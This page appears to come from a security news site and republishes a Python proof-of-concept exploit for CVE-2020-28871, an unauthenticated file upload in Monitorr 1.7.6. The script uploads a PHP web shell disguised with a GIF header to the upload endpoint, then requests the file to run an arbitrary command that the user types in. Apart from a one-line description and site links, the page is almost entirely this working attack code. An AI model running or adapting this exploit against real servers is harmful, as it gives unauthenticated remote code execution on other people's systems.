Home Tools Exploits & CVE's Monitorr 1.7.6 Shell Upload

Monitorr 1.7.6 Shell Upload

February 14, 2023

554

Monitorr version 1.7.6 remote shell upload proof of concept exploit written in Python.

advisories | CVE-2020-28871

# Exploit Title: Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Execution
# Exploit Author: Achuth V P (retrymp3)
# Date: February 09, 2023
# Vendor Homepage: https://github.com/Monitorr/
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Ubuntu
# Version: v1.7.6
# Exploit Description: Monitorr v1.7.6 suffers from unauthenticated file upload to remote code execution vulnerability
# CVE: CVE-2020-28871

import requests
import random
import string
#from requests.auth import HTTPBasicAuth
from colorama import (Fore as F, Back as B, Style as S)
BR,FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = B.RED,F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT

def payL():
    fileName=''.join(random.choice(string.ascii_lowercase) for i in range(16))+'.php'
    tf1=requests.post(url+'/assets/php/upload.php',
        files=(
            ('fileToUpload', (fileName, 'GIF87an<?phpn$var=shell_exec('+'"'+cmd+'"'+');necho "$var"n?>')),))
    tf2=requests.get(url+'/assets/data/usrimg/'+fileName)

    print(tf2.text)

def sig():
    SIG  = SB+FY+"         "+FR+".-----..___.._____.      "+FY+"n"
    SIG += FY+"         |  ..   >||__-__-_|         n"
    SIG += FY+"         "+FR+"|  |.'  ,||_______          "+FY+"n"
    SIG += FY+"         |    _ < ||__-__-_|"+FR+"*  *  *"+FY+" n"
    SIG += FY+"         |  |   ||__-__-_n"
    SIG += FY+"         "+FR+"|___ _ ||_______| "+FY+"n"
    SIG += FY+"n"+"    _____"+FR+"github.com/retrymp3"+FY+"_____n"+ST
    return SIG

def argsetup():
    about  = SB+FT+'Monitorr v1.7.6 - Unauthenticated File upload to Remote Code Executionn'+ST
    return about

if __name__ == "__main__":
    header = SB+FT+"n"+'             '+FR+'retrymp3n'+ST
    print(header)
    print(sig())
    print(argsetup())
    #proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
    url=input("Enter the base url: ")
    cmd=input("Command: ")
    payL()

Monitorr 1.7.6 Shell Upload

Follow us on Instagram @thecyberpost

EDITOR PICKS

FBI, Europol Say Akira Ransomware Has Drained $42M from 250 Firms

Ukrainian soldiers’ apps increasingly targeted for spying, cyber agency warns

Telecom giant Frontier shuts down some systems after cyberattack

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Men Salon Management System 1.0 Cross Site Scripting / SQL Injection

Hostel Management System 2.1 Cross Site Scripting

XML External Entity Via MP3 File Upload On WordPress